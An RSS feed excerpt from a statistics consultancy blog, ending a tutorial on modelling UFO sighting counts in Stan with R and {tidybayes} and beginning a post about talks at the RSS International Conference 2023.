&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="making-the-stan-output-a-bit-more-usable"&gt;Making the Stan output a bit more usable&lt;/h3&gt;
&lt;p&gt;The object &lt;code&gt;fit&lt;/code&gt; is a &lt;code&gt;stanfit&lt;/code&gt; object (an S4 class). These can be a bit awkward to work with, but {tidyverse} fans will find the &lt;a href="http://mjskay.github.io/tidybayes/" rel="external"&gt;{tidybayes}&lt;/a&gt; package offers a natural approach to working with MCMC output. Suppose our Stan program performs sample prediction at the years at which we observed the data via the following &lt;code&gt;genreated quantities&lt;/code&gt; block. The &lt;code&gt;_rng&lt;/code&gt; suffix on the &lt;code&gt;neg_binomial_2_log_rng&lt;/code&gt; tell us we are performing random sampling from the &lt;code&gt;neg_binomial_2_log&lt;/code&gt; distribution.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-stan" data-lang="stan"&gt;generated quantities {
int y_pred[N];
y_pred = neg_binomial_2_log_rng(log_lambda, exp(log_phi));
}
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;We might want to plot the summaries of the distribution of &lt;code&gt;y_pred&lt;/code&gt; over time (or e.g. posterior quantiles as a function of time). In it&amp;rsquo;s raw format, wrangling this data from &lt;code&gt;fit&lt;/code&gt; is a bit clunky. However, the &lt;code&gt;tidybayes::spread_draws()&lt;/code&gt; function makes this simple! The only unusual thing to remember is that, if &lt;code&gt;y_pred&lt;/code&gt; is a vector or array (in Stan), then we need to append &lt;code&gt;[condition]&lt;/code&gt; to the column name (in R) to preserve the fact that a &lt;code&gt;y_pred&lt;/code&gt; is many draws of an array of dimension &lt;code&gt;N&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [condition] tells tidybayes to group by index of y_pred&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tidy_fit &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; fit &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;spread_draws&lt;/span&gt;(y_pred[condition])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(tidy_fit)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# A tibble: 6 × 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Groups: condition [1]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; condition y_pred .chain .iteration .draw
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;int&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;dbl&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;int&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;int&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;int&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We see here that, although we only have one &amp;ldquo;statistical&amp;rdquo; variable (&lt;code&gt;y_pred&lt;/code&gt;), we have quite a few pieces of metadata. Firstly, we have &lt;code&gt;condition&lt;/code&gt; - this is the element of &lt;code&gt;y_pred&lt;/code&gt; that we have repeated samples from. &lt;code&gt;.chain&lt;/code&gt; refers to the MCMC chain, &lt;code&gt;.iteration&lt;/code&gt; is the draw &lt;em&gt;within&lt;/em&gt; that chain, and &lt;code&gt;.draw&lt;/code&gt; is essentially a unique id for each row of &lt;code&gt;tidy_fit&lt;/code&gt;. The &lt;code&gt;y_pred&lt;/code&gt; column is the randomly drawn value of &lt;code&gt;y_pred&lt;/code&gt; at the &lt;code&gt;chain&lt;/code&gt;-&lt;code&gt;iteration&lt;/code&gt; combination.&lt;/p&gt;
&lt;p&gt;The nice thing here is that because our Stan output is a &lt;code&gt;tibble&lt;/code&gt;, we can use all of our favourite {tidyverse} tools to summarise the Stan output.&lt;/p&gt;
&lt;p&gt;For example, to see which years had the largest posterior mean number of sightings, we can use the following snippet:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tidy_fit &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;reframe&lt;/span&gt;(mean &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mean&lt;/span&gt;(y_pred),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; year &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; year_of_sighting) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;distinct&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;mean) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# A tibble: 5 × 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; condition mean year
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;int&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;dbl&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;dbl&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;45&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;119&lt;/span&gt;. &lt;span style="color:#a5d6ff"&gt;2006&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;44&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;118&lt;/span&gt;. &lt;span style="color:#a5d6ff"&gt;2005&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;46&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;114&lt;/span&gt;. &lt;span style="color:#a5d6ff"&gt;2007&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;43&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;109&lt;/span&gt;. &lt;span style="color:#a5d6ff"&gt;2004&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;47&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;103&lt;/span&gt;. &lt;span style="color:#a5d6ff"&gt;2008&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;From this, we can see that the UFO haydays were the mid 2000s. Of course, plotting the data and predictions will give us a more complete picture. Similar logic would allow us to determine which spline terms were the most important; grabbing the \( \beta\) terms (coefficients of spline terms), and ordering by \( | E(\beta \mid \mathcal{D}) | \) is one approach to determining which spline terms are most important:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;fit &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;spread_draws&lt;/span&gt;(beta[condition]) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;summarise&lt;/span&gt;(mean_beta &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mean&lt;/span&gt;(beta)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;abs&lt;/span&gt;(mean_beta)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# A tibble: 3 × 2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; condition mean_beta
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;int&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;dbl&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4.11&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;-2.21&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;-2.04&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We see here that the 10th spline term is the most imporant, followed by the 3rd and 5th. Because MCMC algorithms are stochastic, your results might be slightly different to mine, but the main messages should be very similar.&lt;/p&gt;
&lt;p&gt;Again, those familiar with {tidyverse} packages will find that {tidybayes} makes plotting posterior summaries of the data relatively straight forward&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tidy_fit &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; year_of_sighting, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; sightings_per_year)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;stat_lineribbon&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; y_pred), .width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;.97&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;.89&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;.73&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;.5&lt;/span&gt;), colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;grey10&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_fill_brewer&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; year_of_sighting, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; sightings_per_year), data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; sights_per_year) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;xlab&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Year of reported sighting&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ylab&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Number of recorded sightings per year&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggtitle&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;UFO sighting reports for Great Britain,\nwith posterior summaries superimposed&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;guides&lt;/span&gt;(fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;guide_legend&lt;/span&gt;(title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Posterior\ncoverage&amp;#34;&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_minimal&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="smoothed_count.png" alt="The scatter plot (time series) showing the number of reported UFO sightings (worldwide) from the year 1943 to 2023. The plot has the posterior median and 50%, 73%, 89% and 97% posterior predictive bands superimposed in blue shades. The median line is approximately flat from year = 1943 to year = 1990, and the predictive bands are narrow. After 1990, the predictive bands widen considerably and the trend line rises sharply until about year = 2005, when the median line sharply plummets and the predictive bands become narrower. The median line levels out by 2022." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;From our plot, we see that indeed, the mid 2000s were the peak for UFO sightings, and the model has captured this quite well. Uncertainty quantification is also good; we see that only a small number of points lie outside the 89% and 97% predictive bands. The median line (50%) follows the trend of the data closely and is also fairly smooth!&lt;/p&gt;
&lt;h2 id="summary"&gt;Summary&lt;/h2&gt;
&lt;p&gt;We&amp;rsquo;ve had a whirlwind tour of fitting flexible models for count data in Stan, and how to process the output using R and {tidybayes} to communicate our findings. UFO sightings certainly boomed during the 2000s, but in recent years, the skies appear to be a somewhat empty. We only performed the analysis for the GB subset of the data. What would be interesting (but would take a while!) would be to construct a joint model for UFO sightings across all countries. We could then, for example, cluster the posterior distributions for curves to identify similar trends. This could allow us to investigate the &lt;em&gt;Independence Day&lt;/em&gt; effect; if the effect is real, we would expect to see similar patterns in countries where &lt;em&gt;Independence Day&lt;/em&gt; was popular. Of course, the same effect could be explained by other hypotheses!&lt;/p&gt;
&lt;p&gt;We didn&amp;rsquo;t show you all the code to run the Stan model, you can find a complete R script and Stan file to perform the analysis in our &lt;a href="https://github.com/jumpingrivers/blog/tree/main/blogs/2023-ufo-counts" rel="external"&gt;blogs repo&lt;/a&gt;. As mentioned, the MCMC algorithm is stochastic, so there may be small discrepancies between your results and mine.&lt;/p&gt;
&lt;p&gt;If you think Stan is awesome and want to learn more, then why not consider attending &lt;a href="https://www.jumpingrivers.com/training/all-courses/" rel="external"&gt;one of our Rstan or PyStan courses&lt;/a&gt;? Our courses are a great hands-on and interactive way of getting up-and-running and fitting models with Stan!&lt;/p&gt;
&lt;script src="https://www.jumpingrivers.com/third-party/stan.js"&gt;&lt;/script&gt; &lt;!-- Stan syntax --&gt;
&lt;script&gt;
document.querySelectorAll('pre code.language-stan').forEach(block =&gt; hljs.highlightBlock(block));
&lt;/script&gt;
&lt;style&gt;
pre {
color:#f8f8f2 !important;
background-color:#272822 !important;
-moz-tab-size:4 !important;
-o-tab-size:4 !important;
tab-size:4 !important;
}
&lt;/style&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/ufo-counts-in-stan-bayesian-r/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Talks to watch at the RSS International Conference 2023</title><link>https://www.jumpingrivers.com/blog/royal-statistical-society-conference/</link><pubDate>Tue, 29 Aug 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/royal-statistical-society-conference/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/royal-statistical-society-conference/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/royal-statistical-society-conference/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;The &lt;a href="https://rss.org.uk/training-events/conference-2023/" rel="external"&gt;Royal Statistical Society International conference&lt;/a&gt; is next week from 4-7 September 2023, hosted in Harrogate. Jumping Rivers are exhibiting at the conference, as well as delivering workshops and talks. The draft program can now be &lt;a href="https://virtual.oxfordabstracts.com/#/event/4019/program" rel="external"&gt;viewed online&lt;/a&gt;, so we wanted to let you know where you can find us at the event and some of the other sessions we are looking forward to.&lt;/p&gt;
&lt;h2 id="highlights"&gt;Highlights&lt;/h2&gt;
&lt;h3 id="teaching-statistics-interactively-with-webr"&gt;Teaching statistics interactively with webR&lt;/h3&gt;
&lt;p&gt;If you teach statistics using R and want to make your sessions more engaging, &lt;a href="https://virtual.oxfordabstracts.com/#/event/4019/session/66686" rel="external"&gt;this talk&lt;/a&gt; is one to watch. &lt;a href="https://www.linkedin.com/in/nicola-rennie/" rel="external"&gt;Nicola Rennie&lt;/a&gt; will introduce &lt;a href="https://docs.r-wasm.org/webr/latest/" rel="external"&gt;webR&lt;/a&gt; and demonstrate it&amp;rsquo;s potential to revolutionise the way we teach data science.&lt;/p&gt;
&lt;h3 id="github-version-control-for-research-teaching-and-industry"&gt;GitHub: Version control for research, teaching and industry&lt;/h3&gt;
&lt;p&gt;Open-source coding practises are an integral part of software and model development in all applications of data science. In this &lt;a href="https://virtual.oxfordabstracts.com/#/event/4019/session/66711" rel="external"&gt;session&lt;/a&gt;, the panel will discuss how GitHub can be used to develop models and applications more effectively across teaching, research, and industry.&lt;/p&gt;
&lt;h3 id="how-to-avoid-becoming-an-ornamental-data-scientist"&gt;How to avoid becoming an ornamental data scientist&lt;/h3&gt;
&lt;p&gt;The RSS Data Science and AI Section have toured the country asking practitioners and companies about their hopes and fears about a career in data science and AI. In &lt;a href="https://virtual.oxfordabstracts.com/#/event/4019/session/65938" rel="external"&gt;this session&lt;/a&gt; they will outline how to become efficient, effective and ethical in your application of the statistical and algorithmic tools of the trade.&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-royal-statistical-society-conference"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;!-- This is where the ad goes! Just use the name of the shortcode file. --&gt;&lt;/p&gt;
&lt;h2 id="jumping-rivers-talks-and-events"&gt;Jumping Rivers Talks and Events&lt;/h2&gt;
&lt;p&gt;Throughout the week, you can find &lt;a href="https://www.linkedin.com/in/statsrhian/" rel="external"&gt;Rhian Davies&lt;/a&gt; and &lt;a href="https://www.linkedin.com/in/jack-kennedy-733a09161/" rel="external"&gt;Jack Kennedy&lt;/a&gt; at the Jumping Rivers exhibition stand. Come along and say hello and pick up one of our Jumping Rivers coasters!&lt;/p&gt;
&lt;h3 id="pre-conference-workshop-for-early-career-researchers"&gt;Pre-conference workshop for early career researchers&lt;/h3&gt;
&lt;p&gt;On Monday 4th September, Jack and Rhian will both be presenting at the &lt;a href="https://virtual.oxfordabstracts.com/#/event/4019/program?session=65926&amp;s=0" rel="external"&gt;pre-conference workshop for early career researchers&lt;/a&gt;. Jack will be kicking off the afternoon, introducing the Young Statisticians section and welcoming the young statisticians to the conference, while Rhian will be deliviering a skills workshop later in the afternoon on Building your data science portfolio.&lt;/p&gt;
&lt;h3 id="making-maps-visualising-spatial-data-in-r"&gt;Making Maps! Visualising spatial data in R&lt;/h3&gt;
&lt;p&gt;On Tuesday 5th September, Rhian will be delivering the workshop &lt;a href="https://virtual.oxfordabstracts.com/#/event/4019/program?session=65958&amp;s=1440" rel="external"&gt;Making Maps! Visualising spatial data in R&lt;/a&gt;, which will cover the fundamentals of working with geospatial data in R. Can&amp;rsquo;t attend? We offer a &lt;a href="https://www.jumpingrivers.com/training/course/r-spatial-analysis-sf-tmap-leaflet/" rel="external"&gt;training course on spatial data analysis&lt;/a&gt;.&lt;/p&gt;
